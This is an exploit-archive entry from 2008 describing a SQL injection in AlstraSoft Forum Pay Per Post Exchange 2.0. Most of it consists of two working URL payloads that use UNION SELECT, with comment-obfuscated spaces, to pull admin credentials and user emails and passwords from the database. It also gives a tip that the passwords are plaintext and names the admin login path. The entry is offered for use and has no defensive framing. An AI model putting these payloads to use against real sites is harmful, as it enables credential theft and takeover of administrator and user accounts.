[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AlstraSoft Forum Pay Per Post Exchange 2.0 SQL Injection Vulnerability
# Published : 2008-01-21
# Author : t0pP8uZz
# Previous Title : Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities
# Next Title : MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit
--==+================================================================================+==--
--==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://alstrasoft.com/forum-pay-per-post-exchange.htm
DORK: N/A
DESCRIPTION:
pull admin/user info from the database
EXPLOITS:
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(auser,0x3a,apass),7/**/FROM/**/admin/*
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(username,0x3a,uemail,0x3a,upass),7/**/FROM/**/users/*
NOTE/TIP:
passwords are in plaintext.
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org !
--==+================================================================================+==--
--==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# www.Syue.com [2008-01-21]